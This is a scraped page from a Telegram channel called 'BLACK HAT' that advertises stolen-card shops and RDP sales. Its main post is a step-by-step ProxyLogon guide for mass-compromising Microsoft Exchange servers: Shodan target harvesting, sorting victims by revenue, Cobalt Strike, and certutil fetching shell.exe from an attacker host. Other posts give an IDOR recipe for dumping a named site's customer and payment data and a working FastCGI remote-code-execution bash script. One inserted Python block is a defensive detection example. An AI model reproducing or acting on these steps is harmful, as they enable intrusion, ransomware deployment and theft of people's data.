
🎩BLACK HAT🎩

Channel address: @data_brokers
Categories: Education
Language: English
Subscribers: 5.36K
Description from channel

SINCE 2019
Official Handle : @queen_inc
Backup : https://t.me/ 2pBKAJt5TqZjNDU1
preferred
yalelodge.cm - cc shop
allworld.cards -cc shop
orderswq6q7kqghs.onion - rdp/servers
orders.bz

Ratings & Reviews

3.00

3 reviews


5 stars: 0
4 stars: 1
3 stars: 1
2 stars: 1
1 star: 0


The latest messages (18)

2021-06-28 13:00:40 What is ProxyLogon?

ProxyLogon is formally the common name for CVE-2021-26855, a vulnerability in Microsoft Exchange Server that allows an attacker to bypass authentication and impersonate an administrator. We also linked this bug with another vulnerability, CVE-2021-27065, a post-authorization arbitrary file write, in order to get code execution. All affected components are vulnerable by default!


As a result, no unauthenticated attacker can execute arbitrary commands on a Microsoft Exchange Server through the only open port 443!


What do we need?

1) This is ProxyLogon itself; for me the best implementation of this CVE is from the author Udyz: https://github.com/Udyz

"A modified script will be available only to private channel members"

2) Cobalt Strike [latest cracked available for private members of https://t.me/data_brokers]
3) Invoke-Obfuscation for PowerShell
4) IEX & CERTUTIL.EXE



The attack will take place in 3 parts

1) Collecting Material, Reconnaissance

2) Penetration into the network

3) Persistence in the network

Let's start with collecting the material. I have laid out the "Manual for Shodan", so it will help us collect a lot of material at once for penetration tests into the network.

EXAMPLE:

Insert the key I have laid out and run: shodan download exchange.json.gz vuln: cve-2021-26855 This will give plus or minus 10k vulnerable IP addresses.
That's all for the moment: I have told you where to look, and you get a lot of material at once, plus the fact that it is immediately vulnerable.

After shodan has downloaded everything, run the command: gzip -d exchange.json.gz
Then parse the IP addresses from the json file: shodan parse exchange.json.gz --fields ip_str > vuln.txt

This completes the collection of the material; then comes the exploration of the material: what it is, which IP belongs where, etc.

We take the parser; I will post this parser below along with the other scripts.

Rename exchange.txt to iplist.txt and wait.

After the parser parses the IP addresses, the output.txt file will be saved, where there will be domains for each IP. Here, after breaking through, you can take the software laid out by Boris; that is everyone's own business.

Well, this is where the exploration of the material ends: what kind of IP it refers to, as well as revenue.

Step two: scan the vulnerable IPs for SSRF.
Authorization from the login list was cut out of the script, and I left only 2 logins, administrator & admin, with spn 500. Why did I cut out everything else and leave only 2? Because logins other than these two cannot log in, and scanning for 20-30-100 more is a waste of time.

Run the proxy.py script, then let's go drink tea, coffee, beer..

After some time the 10k IPs are checked and are in output.txt. After proxy.py has finished its work, we drop the IPs into pars.py and wait for the result of which domains it issued; we come across different revenues, from 300k to 5kkk.

We take the author's AutoProxyLogon.py script, leave only the 2 logins administrator & admin in the text editor, change the author's script from cmd /c to powershell /c, and the line below as well..

And voila, we have access to the machine, already with PowerShell open. Try the first option: at that time I had 3 VPS, on the first Cobalt Strike, on the 2nd the teamserver, and on the 3rd I will not tell, it's a secret!

There are 2 generation options as well as delivery: the first is raising the payload in Cobalt; the second is generating a payload exe, uploading it to the same AnonFiles, and delivering it to the machine with CERTUTIL.EXE, which sometimes gets fucked on the validity of the site certificate; the 2nd/3rd creation option is Payload Generator Script (S) web delivery, i.e. we have figured out how we will make the delivery.

All generated payloads were raised on the server via web delivery. We go to the victim's terminal, that is, to our own, and write certutil.exe -urlcache -split -f http://{ip}{or domain}/shell.exe shell.exe. I did everything through ngrok to understand whether there was delivery to the victim's computer or not: 200 ok.
241 views, 10:00
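As an added detection-side example (not code from the channel or from any tool it names), here are the two host-level signals a defender would alert on for the steps described in the post above: certutil.exe used as a downloader with -urlcache, and Exchange's IIS worker process w3wp.exe spawning cmd or PowerShell. The event field names and the sample records are constructed assumptions, not a vendor's telemetry schema.

```python
import re

# Added example; event field names and sample records are constructed
# assumptions, not a vendor's telemetry schema.

# certutil.exe used as a downloader: -urlcache together with -f and an
# http(s) URL, the delivery step the post describes.
CERTUTIL_DL = re.compile(
    r"certutil(\.exe)?\s+(?=.*-urlcache)(?=.*-f\b)(?=.*https?://)", re.I)

# Exchange's web front end runs inside the IIS worker process w3wp.exe, which
# has no business spawning a shell: this is the host-side view of a webshell
# or ProxyLogon-style command execution.
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}

def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def classify(event):
    """Return the list of alert tags for one process-creation event."""
    tags = []
    if CERTUTIL_DL.search(event["command_line"]):
        tags.append("certutil_urlcache_download")
    if (_basename(event["parent_image"]) == "w3wp.exe"
            and _basename(event["image"]) in SHELL_CHILDREN):
        tags.append("iis_worker_spawned_shell")
    return tags

def scan(events):
    """Map event id -> alert tags, keeping only events that fired a rule."""
    alerts = {}
    for event in events:
        tags = classify(event)
        if tags:
            alerts[event["id"]] = tags
    return alerts

# Constructed sample events (not real telemetry); 203.0.113.10 is a
# documentation address.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell /c whoami"},
    {"id": 2, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil.exe -urlcache -split -f http://203.0.113.10/shell.exe shell.exe"},
    {"id": 3, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil -hashfile C:\\Temp\\setup.msi SHA256"},
]
```

Running scan(SAMPLE_EVENTS) flags event 1 as a shell spawned by the IIS worker and event 2 as a certutil download, while the benign certutil hash check in event 3 stays silent.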
2021-06-26 10:23:01 From now on, long articles will be posted as PDF, as per member requests.
430 views, 07:23
2021-06-21 06:19:34
#AppSec #Ezine - 383rd Edition

https://pathonproject.com/zb/?8c6b23146abcdec2#FQbqxYkv6ILzMzktTrEw4BHEA94ASybe6Rw/FTWoDlg=
545 views, 03:19
2021-06-09 08:06:31
doodhvale.com, an Indian site, exposes lots of data. Just go to the main website, select something, enter a burner number and receive an OTP, all with Burp Intruder on. Once it reaches the add address step you'll see a request like the one in the image; forward it to Repeater, change the user id and send it. At every correct user_id you can view their whole account data, including payment information [if present].
155 views, edited, 05:06
2021-06-06 23:24:54
Have you ever seen port 9000 open?
Nmap (even with the -sV argument) doesn't recognize it, but it was probably FastCGI.

And the cool thing is that this gives arbitrary code execution; it is enough to connect to it, for example, with a bash script like this:

#!/bin/bash

PAYLOAD="';" # Command
FILENAMES="/var/www/public/index.php" # Path to an existing file

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done

Or use a more powerful client, such as this one.
https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75
696 views, 20:24
2021-06-04 09:42:50 If anybody is into cryptocurrency, it's a good time to invest in ADA (Cardano).
225 views, 06:42
2021-06-02 14:45:40 CVE-2021-25374 - Samsung Account Access Script

https://github.com/FSecureLABS/CVE-2021-25374_Samsung-Account-Access
741 views, 11:45